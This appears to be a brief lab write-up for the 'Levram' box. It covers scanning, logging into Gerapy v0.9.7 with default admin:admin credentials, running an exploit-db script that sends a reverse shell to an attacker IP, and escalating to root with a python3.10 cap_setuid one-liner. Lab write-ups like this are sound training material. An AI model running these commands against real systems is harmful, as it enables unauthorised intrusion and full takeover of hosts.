Levram (easy, linux, 2023)

[WDavid404]

Keypoints:

• Gerapy v0.9.7 exploit--> https://www.exploit-db.com/exploits/50640
• [PE] python3.10 cap_set_uid=ep

[WDavid404]

PORT     STATE SERVICE  REASON         VERSION
22/tcp   open  ssh      syn-ack ttl 61 OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
8000/tcp open  http-alt syn-ack ttl 61 WSGIServer/0.2 CPython/3.10.6
|_http-cors: GET POST PUT DELETE OPTIONS PATCH
|_http-server-header: WSGIServer/0.2 CPython/3.10.6
| http-methods: 
|_  Supported Methods: OPTIONS GET
|_http-title: Gerapy

http://192.168.207.24:8000 -->Can login with admin:admin --> Gerapy v0.9.7

Search Gerapy v0.9.7 exploit --> https://www.exploit-db.com/exploits/50640

In order to use this exploit py file, need to create a new project then, run python3 50640.py -t 192.168.207.24 -p 8000 -L 192.168.45.180 -P 80

Got a reverse shell from the target host

PE:

linpeas: /usr/bin/python3.10 cap_setuid=ep According to GTFOBINS /usr/bin/python3.10 -c 'import os; os.setuid(0); os.system("/bin/sh")'